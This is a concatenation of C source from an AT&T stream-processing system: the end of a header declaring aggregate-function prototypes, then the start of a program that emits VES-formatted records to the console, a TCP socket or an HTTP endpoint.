void POSAVG_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_float_t v);
void POSAVG_HFTA_AGGR_OUTPUT_(gs_float_t * v, gs_sp_t buf);
void POSAVG_HFTA_AGGR_DESTROY_(gs_sp_t buf);
///////////////////////////////////////////////////////////////////
///// avg_udaf (simple example)
// hfta avg_udaf
void avg_udaf_HFTA_AGGR_INIT_(gs_sp_t b);
void avg_udaf_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v);
void avg_udaf_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b);
void avg_udaf_HFTA_AGGR_DESTROY_(gs_sp_t b);
// avg_udaf superaggregate
void avg_udaf_hfta_HFTA_AGGR_INIT_(gs_sp_t b);
void avg_udaf_hfta_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void avg_udaf_hfta_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b);
void avg_udaf_hfta_HFTA_AGGR_DESTROY_(gs_sp_t b);
// Extraction function
gs_float_t extr_avg_fcn(vstring *v);
// first aggregate
// hfta only
void FIRST_HFTA_AGGR_INIT_(gs_uint32_t* scratch);
void FIRST_HFTA_AGGR_REINIT_(gs_uint32_t* scratch);
void FIRST_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
void FIRST_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void FIRST_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void FIRST_HFTA_AGGR_INIT_(gs_int32_t* scratch);
void FIRST_HFTA_AGGR_REINIT_(gs_int32_t* scratch);
void FIRST_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
void FIRST_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void FIRST_HFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void FIRST_HFTA_AGGR_INIT_(gs_uint64_t* scratch);
void FIRST_HFTA_AGGR_REINIT_(gs_uint64_t* scratch);
void FIRST_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
void FIRST_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void FIRST_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void FIRST_HFTA_AGGR_INIT_(gs_int64_t* scratch);
void FIRST_HFTA_AGGR_REINIT_(gs_int64_t* scratch);
void FIRST_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
void FIRST_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void FIRST_HFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void FIRST_HFTA_AGGR_INIT_(vstring* scratch);
void FIRST_HFTA_AGGR_REINIT_(vstring* scratch);
void FIRST_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void FIRST_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void FIRST_HFTA_AGGR_DESTROY_(vstring* scratch);
// hfts-lfta split
void FIRST_hfta_HFTA_AGGR_INIT_(gs_uint32_t* scratch);
void FIRST_hfta_HFTA_AGGR_REINIT_(gs_uint32_t* scratch);
void FIRST_hfta_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
void FIRST_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void FIRST_hfta_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void FIRST_INT_hfta_HFTA_AGGR_INIT_(gs_int32_t* scratch);
void FIRST_INT_hfta_HFTA_AGGR_REINIT_(gs_int32_t* scratch);
void FIRST_INT_hfta_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
void FIRST_INT_hfta_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void FIRST_INT_hfta_HFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void FIRST_ULL_hfta_HFTA_AGGR_INIT_(gs_uint64_t* scratch);
void FIRST_ULL_hfta_HFTA_AGGR_REINIT_(gs_uint64_t* scratch);
void FIRST_ULL_hfta_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
void FIRST_ULL_hfta_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void FIRST_ULL_hfta_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void FIRST_LL_hfta_HFTA_AGGR_INIT_(gs_int64_t* scratch);
void FIRST_LL_hfta_HFTA_AGGR_REINIT_(gs_int64_t* scratch);
void FIRST_LL_hfta_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
void FIRST_LL_hfta_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void FIRST_LL_hfta_HFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void FIRST_STR_hfta_HFTA_AGGR_INIT_(vstring* scratch);
void FIRST_STR_hfta_HFTA_AGGR_REINIT_(vstring* scratch);
void FIRST_STR_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void FIRST_STR_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void FIRST_STR_hfta_HFTA_AGGR_DESTROY_(vstring* scratch);
// last aggregate
// hfta only
void LAST_HFTA_AGGR_INIT_(gs_uint32_t* scratch);
void LAST_HFTA_AGGR_REINIT_(gs_uint32_t* scratch);
void LAST_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
void LAST_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void LAST_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void LAST_HFTA_AGGR_INIT_(gs_int32_t* scratch);
void LAST_HFTA_AGGR_REINIT_(gs_int32_t* scratch);
void LAST_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
void LAST_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void LAST_HFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void LAST_HFTA_AGGR_INIT_(gs_uint64_t* scratch);
void LAST_HFTA_AGGR_REINIT_(gs_uint64_t* scratch);
void LAST_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
void LAST_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void LAST_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void LAST_HFTA_AGGR_INIT_(gs_int64_t* scratch);
void LAST_HFTA_AGGR_REINIT_(gs_int64_t* scratch);
void LAST_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
void LAST_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void LAST_HFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void LAST_HFTA_AGGR_INIT_(vstring* scratch);
void LAST_HFTA_AGGR_REINIT_(vstring* scratch);
void LAST_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void LAST_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void LAST_HFTA_AGGR_DESTROY_(vstring* scratch);
// hfta/lfta split
void LAST_hfta_HFTA_AGGR_INIT_(gs_uint32_t* scratch);
void LAST_hfta_HFTA_AGGR_REINIT_(gs_uint32_t* scratch);
void LAST_hfta_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
void LAST_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void LAST_hfta_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void LAST_INT_hfta_HFTA_AGGR_INIT_(gs_int32_t* scratch);
void LAST_INT_hfta_HFTA_AGGR_REINIT_(gs_int32_t* scratch);
void LAST_INT_hfta_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
void LAST_INT_hfta_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void LAST_INT_hfta_HFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void LAST_ULL_hfta_HFTA_AGGR_INIT_(gs_uint64_t* scratch);
void LAST_ULL_hfta_HFTA_AGGR_REINIT_(gs_uint64_t* scratch);
void LAST_ULL_hfta_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
void LAST_ULL_hfta_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void LAST_ULL_hfta_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void LAST_LL_hfta_HFTA_AGGR_INIT_(gs_int64_t* scratch);
void LAST_LL_hfta_HFTA_AGGR_REINIT_(gs_int64_t* scratch);
void LAST_LL_hfta_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
void LAST_LL_hfta_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void LAST_LL_hfta_HFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void LAST_STR_hfta_HFTA_AGGR_INIT_(vstring* scratch);
void LAST_STR_hfta_HFTA_AGGR_REINIT_(vstring* scratch);
void LAST_STR_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void LAST_STR_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void LAST_STR_hfta_HFTA_AGGR_DESTROY_(vstring* scratch);
///////////////////////////////////////////////////////////////
// count_diff aggregate
///////////////////////////////////////////////////////////////
void count_diff_HFTA_AGGR_INIT_(gs_sp_t scratch);
void count_diff_HFTA_AGGR_REINIT_(gs_sp_t scratch);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, gs_uint32_t val);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, gs_int32_t val);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, gs_uint64_t val);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, gs_int64_t val);
void count_diff_HFTA_AGGR_UPDATE_(gs_sp_t scratch, vstring *val);
void count_diff_HFTA_AGGR_OUTPUT_(gs_uint32_t *res, gs_sp_t scratch);
void count_diff_HFTA_AGGR_DESTROY_(gs_sp_t scratch);
void count_diff_hfta_HFTA_AGGR_INIT_(gs_sp_t s);
void count_diff_hfta_HFTA_AGGR_REINIT_(gs_sp_t s);
void count_diff_hfta_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *val);
void count_diff_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t *res, gs_sp_t s);
void count_diff_hfta_HFTA_AGGR_DESTROY_(gs_sp_t scratch);
//////////////////////////////////////////////
// CAT_aggr, aggregate strings by catenation
//////////////////////////////////////////////
void CAT_aggr_HFTA_AGGR_INIT_(gs_sp_t s);
void CAT_aggr_HFTA_AGGR_REINIT_(gs_sp_t s);
void CAT_aggr_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *sep, vstring *str);
void CAT_aggr_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t s);
void CAT_aggr_HFTA_AGGR_DESTROY_(gs_sp_t s);
//////////////////////////////////////////////
// CAT_aggr, aggregate strings by catenation but only when the payload changes
//////////////////////////////////////////////
void CAT_aggr_diff_HFTA_AGGR_INIT_(gs_sp_t s);
void CAT_aggr_diff_HFTA_AGGR_REINIT_(gs_sp_t s);
void CAT_aggr_diff_HFTA_AGGR_UPDATE_(gs_sp_t s, vstring *str);
void CAT_aggr_diff_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t s);
void CAT_aggr_diff_HFTA_AGGR_DESTROY_(gs_sp_t s);
/////////////////////////////////////////////////////////
// time-averaged sum, from aperiodic reports
////////////////////////////////////////////////////////
void time_avg_HFTA_AGGR_INIT_(gs_sp_t s);
void time_avg_HFTA_AGGR_DESTROY_(gs_sp_t s);
void time_avg_HFTA_AGGR_REINIT_(gs_sp_t s);
void time_avg_HFTA_AGGR_OUTPUT_(gs_float_t *result, gs_sp_t s);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_float_t val, gs_int64_t ts, gs_int64_t window);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val, gs_int64_t ts, gs_int64_t window);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val, gs_int64_t ts, gs_int64_t window);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val, gs_int64_t ts, gs_int64_t window);
void time_avg_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val, gs_int64_t ts, gs_int64_t window);
// ------------------------------------------------------------
// running_sum_max : get the running sum of an int,
// be able to report this sum and also its max value
// during the time window
// ------------------------------------------------------------
void run_sum_max_HFTA_AGGR_INIT_(gs_sp_t s);
void run_sum_max_HFTA_AGGR_REINIT_(gs_sp_t s);
void run_sum_max_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b);
void run_sum_max_HFTA_AGGR_DESTROY_(gs_sp_t b);
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t v);
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t v);
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t v);
void run_sum_max_HFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t v);
gs_int64_t extr_running_sum(vstring *v);
gs_int64_t extr_running_sum_max(vstring *v);
///////////////////////////////////////////////////////////////
// running_array_aggr aggregate
///////////////////////////////////////////////////////////////
void running_array_aggr_hfta_HFTA_AGGR_INIT_(vstring* scratch);
void running_array_aggr_hfta_HFTA_AGGR_REINIT_(vstring* scratch);
void running_array_aggr_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void running_array_aggr_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void running_array_aggr_hfta_HFTA_AGGR_DESTROY_(vstring* scratch);
////////////////////////////////////////////////////////////////
/// Flip's sample-based quantiles
/****************************************************************/
/* HFTA functions */
/****************************************************************/
// void quant_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t);
// void quant_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t, vstring *);
// void quant_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *, gs_sp_t);
// void quant_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t);
// gs_uint32_t extr_quant_hfta3_fcn(vstring *, gs_float_t);
// gs_uint32_t extr_med_hfta3_fcn(vstring *);
// gs_uint32_t extr_quant_hfta3_space(vstring *);
void quant_f_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_f_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_f_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_float_t extr_quant_f_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_float_t extr_f_med_hfta3_fcn(vstring *v);
void quant_f_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
void quant_ui_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_ui_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_ui_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_uint32_t extr_quant_ui_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_uint32_t extr_ui_med_hfta3_fcn(vstring *v);
void quant_ui_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
void quant_i_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_i_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_i_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_int32_t extr_quant_i_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_int32_t extr_i_med_hfta3_fcn(vstring *v);
void quant_i_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
void quant_ul_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_ul_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_ul_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_uint64_t extr_quant_ul_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_uint64_t extr_ul_med_hfta3_fcn(vstring *v);
void quant_ul_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
void quant_l_udaf_hfta3_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_l_udaf_hfta3_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void quant_l_udaf_hfta3_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b) ;
//gs_int64_t extr_quant_l_hfta3_fcn(vstring *v, gs_float_t phi) ;
//gs_int64_t extr_l_med_hfta3_fcn(vstring *v);
void quant_l_udaf_hfta3_HFTA_AGGR_DESTROY_(gs_sp_t b) ;
/****************************************************************/
/* HFTA-only functions */
/****************************************************************/
// void quant_udaf_hfta0_HFTA_AGGR_INIT_(gs_sp_t);
// void quant_udaf_hfta0_HFTA_AGGR_UPDATE_(gs_sp_t, gs_uint32_t);
// void quant_udaf_hfta0_HFTA_AGGR_OUTPUT_(vstring *, gs_sp_t);
// void quant_udaf_hfta0_HFTA_AGGR_DESTROY_(gs_sp_t);
// gs_uint32_t extr_quant_hfta0_fcn(vstring *, gs_float_t);
// gs_uint32_t extr_med_hfta0_fcn(vstring *);
// gs_uint32_t extr_quant_hfta0_space(vstring *);
void quant_ui_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_ui_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v) ;
void quant_ui_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_ui_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_uint32_t extr_quant_ui_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_uint32_t extr_med_ui_hftaZ_fcn(vstring *v) ;
int quant_ui_udaf_hftaZ_nelem(gs_sp_t b) ;
void quant_ul_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_ul_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint64_t v) ;
void quant_ul_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_ul_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_uint64_t extr_quant_ul_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_uint64_t extr_med_ul_hftaZ_fcn(vstring *v) ;
int quant_ul_udaf_hftaZ_nelem(gs_sp_t b) ;
void quant_i_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_i_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_int32_t v) ;
void quant_i_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_i_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_int32_t extr_quant_i_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_int32_t extr_med_i_hftaZ_fcn(vstring *v) ;
int quant_i_udaf_hftaZ_nelem(gs_sp_t b) ;
void quant_l_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_l_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_int64_t v) ;
void quant_l_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_l_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_int64_t extr_quant_l_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_int64_t extr_med_l_hftaZ_fcn(vstring *v) ;
int quant_l_udaf_hftaZ_nelem(gs_sp_t b) ;
void quant_f_udaf_hftaZ_HFTA_AGGR_INIT_(gs_sp_t b);
void quant_f_udaf_hftaZ_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_float_t v) ;
void quant_f_udaf_hftaZ_HFTA_AGGR_OUTPUT_(vstring *r, gs_sp_t b);
void quant_f_udaf_hftaZ_HFTA_AGGR_DESTROY_(gs_sp_t b);
gs_float_t extr_quant_f_hftaZ_fcn(vstring *v, gs_float_t phi) ;
gs_float_t extr_med_f_hftaZ_fcn(vstring *v) ;
int quant_f_udaf_hftaZ_nelem(gs_sp_t b) ;
/****************************************************************/
// Approximate count distinct.
// Rely on the minhashing approach.
// Currently HFTA-only
// Uses a 32-bit hash, tested up to 100,000,000 elements
// and it gave good results (within 7%)
/****************************************************************/
// ---------------------------------------------
// HFTA-only
void approx_count_distinct_udaf_HFTA_AGGR_INIT_(gs_sp_t buf);
void approx_count_distinct_udaf_HFTA_AGGR_REINIT_(gs_sp_t buf);
void approx_count_distinct_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf);
void approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, vstring *val);
void approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t buf);
void running_approx_count_distinct_udaf_HFTA_AGGR_INIT_(gs_sp_t buf);
void running_approx_count_distinct_udaf_HFTA_AGGR_REINIT_(gs_sp_t buf);
void running_approx_count_distinct_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf);
void running_approx_count_distinct_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, vstring *val);
void running_approx_count_distinct_udaf_HFTA_AGGR_OUTPUT_(vstring *res, gs_sp_t buf);
gs_float_t extr_approx_count_distinct(vstring *v);
#endif
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
/*
* Print ves formatted records to the console.
* Each line is a json record.
* Based on gsprintconsole.c, just differences in formatting.
*/
#include <app.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#ifdef RMR_ENABLED
#include <rmr/rmr.h>
#include <rmr/RIC_message_types.h>
#include <sys/epoll.h>
#endif
#include "gsconfig.h"
#include "gstypes.h"
#include "gshub.h"
#include "simple_http.h"
#include <schemaparser.h>
#define MAXLINE 100000
static unsigned tcpport=0;
static char linebuf[MAXLINE];
int listensockfd=0;
int fd=0;
// how frequently we will log stats (expressed in tuples posted)
#define STAT_FREQUENCY 5
// Not all systems have timersub defined so make sure its ther
#ifndef timersub
#define timersub(tvp, uvp, vvp) \
do { \
(vvp)->tv_sec = (tvp)->tv_sec - (uvp)->tv_sec; \
(vvp)->tv_usec = (tvp)->tv_usec - (uvp)->tv_usec; \
if ((vvp)->tv_usec < 0) { \
(vvp)->tv_sec--; \
(vvp)->tv_usec += 1000000; \
} \
} while (0)
#endif
void hand(int iv) {
ftaapp_exit();
fprintf(stderr, "exiting via signal handler %d...\n", iv);
exit(1);
}
static void wait_for_client() {
struct sockaddr_in serv_addr,cli_addr;
socklen_t clilen;
if (listensockfd==0) {
gs_int32_t on = 1;
listensockfd=socket(AF_INET, SOCK_STREAM, 0);
if (listensockfd < 0) {
gslog(LOG_EMERG,"Error:Could not create socket for tcp data stream");
exit(1);
}
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = INADDR_ANY;
serv_addr.sin_port = htons(tcpport);
#ifndef __linux__
/* make sure we can reuse the common port rapidly */
if (setsockopt(listensockfd, SOL_SOCKET, SO_REUSEPORT,
(gs_sp_t )&on, sizeof(on)) != 0) {
gslog(LOG_EMERG,"Error::could not set socket option");
exit(1);
}
#endif
if (setsockopt(listensockfd, SOL_SOCKET, SO_REUSEADDR,
(gs_sp_t )&on, sizeof(on)) != 0) {
gslog(LOG_EMERG,"Error::could not set socket option");
exit(1);
}
if (bind(listensockfd, (struct sockaddr *) &serv_addr,
sizeof(serv_addr)) < 0) {
gslog(LOG_EMERG,"Error:Could not bind socket for tcp data stream");
exit(1);
}
}
do {
listen(listensockfd,5);
clilen = sizeof(cli_addr);
fd=accept(listensockfd, (struct sockaddr *) &cli_addr, &clilen);
if (fd<0) {
gslog(LOG_EMERG,"Error:Could not accept connection on tcp socket");
}
} while (fd==0);
}
static void emit_socket() {
unsigned o,w,l;
o=0;
w=0;
l=strlen(linebuf);
do {
if((w=write(fd,&linebuf[o],l))==0) {
close(fd);
wait_for_client();
}
o=o+w;
} while (o<l);
}
static void emit_line() {
if (tcpport==0) {
printf("%s",linebuf);
} else {
emit_socket();
}
}
int main(int argc, char* argv[]) {
gs_sp_t me = argv[0];
FTAID fta_id;
gs_int32_t schema, ch;
FTAID rfta_id;
gs_uint32_t rsize;
gs_uint32_t bufsz=8*1024*1024;
gs_int8_t rbuf[2*MAXTUPLESZ];
gs_int32_t numberoffields;
gs_int32_t verbose=0;
gs_int32_t y, lcv;
void *pblk;
gs_int32_t pblklen;
gs_int32_t n_actual_param;
gs_int32_t n_expected_param;
gs_int32_t xit = 0;
gs_int32_t dump = 0;
struct timeval tvs, tve, tvd;
gs_retval_t code;
endpoint gshub;
endpoint dummyep;
gs_uint32_t tip1,tip2,tip3,tip4;
gs_sp_t instance_name;
gs_sp_t rmr_port = NULL;
#ifdef RMR_ENABLED
// RMR-related parameters
gs_int32_t rmr_mtype = MC_REPORT;
#endif
gs_sp_t curl_address = NULL;
endpoint curl_endpoint;
gs_sp_t curl_url = NULL;
gs_sp_t curl_auth = NULL;
gs_uint32_t http_code;
gs_uint32_t ves_version=7;
gs_uint32_t tlimit = 0; // time limit in seconds
time_t start_time, curr_time;
gs_uint64_t post_success_cnt = 0ULL;
gs_uint64_t post_failure_cnt = 0ULL;
#ifdef RMR_ENABLED
void* mrc; //msg router context
struct epoll_event events[1]; // list of events to give to epoll
struct epoll_event epe; // event definition for event to listen to
gs_int32_t ep_fd = -1; // epoll's file des (given to epoll_wait)
gs_int32_t rcv_fd; // file des that NNG tickles -- give this to epoll to listen on
gs_int32_t nready; // number of events ready for receive
rmr_mbuf_t* rmr_sbuf; // send buffer
rmr_mbuf_t* rmr_rbuf; // received buffer
gs_uint64_t rmr_post_success_cnt = 0ULL;
gs_uint64_t rmr_post_failure_cnt = 0ULL;
#endif
gsopenlog(argv[0]);
while ((ch = getopt(argc, argv, "l:p:r:vXDC:U:R:A:V:")) != -1) {
switch (ch) {
case 'r':
bufsz=atoi(optarg);
break;
case 'p':
tcpport=atoi(optarg);
break;
case 'v':
verbose++;
break;
case 'X':
xit++;
break;
case 'D':
dump++;
break;
case 'l':
tlimit = atoi(optarg);
break;
case 'V':
ves_version = atoi(optarg);
break;
case 'C':
curl_address = strdup(optarg);
if (sscanf(curl_address,"%u.%u.%u.%u:%hu",&tip1,&tip2,&tip3,&tip4,&(curl_endpoint.port))!= 5 ) {
gslog(LOG_EMERG,"Curl IP NOT DEFINED");
exit(1);
}
curl_endpoint.ip=htonl(tip1<<24|tip2<<16|tip3<<8|tip4);
curl_endpoint.port=htons(curl_endpoint.port);
break;
case 'R':
rmr_port=strdup(optarg);
break;
case 'U':
curl_url = strdup(optarg);
break;
case 'A':
curl_auth = strdup(optarg);
break;
default:
usage:
fprintf(stderr, "usage: %s [-r <bufsz>] [-p <port>] [-l <time_limit>] [-v] [-X] [-D] [-C <curl_dest>:<curl_port>] [-U <curl_url>] [-A <authentication_string>] [-V <ves_version>] [-R <rmr_port>] <gshub-hostname>:<gshub-port> <gsinstance_name> query param1 param2...\n",
*argv);
exit(1);
}
}
argc -= optind;
argv += optind;
if (argc<3) goto usage;
if (sscanf(argv[0],"%u.%u.%u.%u:%hu",&tip1,&tip2,&tip3,&tip4,&(gshub.port))!= 5 ) {
gslog(LOG_EMERG,"HUB IP NOT DEFINED");
exit(1);
}
gshub.ip=htonl(tip1<<24|tip2<<16|tip3<<8|tip4);
gshub.port=htons(gshub.port);
instance_name=strdup(argv[1]);
if (set_hub(gshub)!=0) {
gslog(LOG_EMERG,"Could not set hub");
exit(1);
}
if (set_instance_name(instance_name)!=0) {
gslog(LOG_EMERG,"Could not set instance name");
exit(1);
}
if (get_initinstance(gshub,instance_name,&dummyep,1)!=0) {
gslog(LOG_EMERG,"Did not receive signal that GS is initiated");
}
// If this uses curl output, ensure consistency in the curl args
if(curl_address != NULL){
if(curl_url == NULL){
gslog(LOG_EMERG,"Curl IP defined, but there is no url (e.g. /foo/bar");
exit(1);
}
if(curl_auth==NULL){
curl_auth = "";
}
}
gettimeofday(&tvs, 0);
argc -=2;
argv +=2;
if (argc < 1)
goto usage;
if (rmr_port) {
#ifdef RMR_ENABLED
/* initialize RMR library */
if( (mrc = rmr_init( rmr_port, 1400, RMRFL_NONE )) == NULL ) {
fprintf(stderr, "%s::error:unable to initialise RMR\n", me);
exit( 1 );
}
rcv_fd = rmr_get_rcvfd( mrc ); // set up epoll things, start by getting the FD from MRr
if( rcv_fd < 0 ) {
fprintf(stderr, "%s::error:unable to set up polling fd\n", me);
exit( 1 );
}
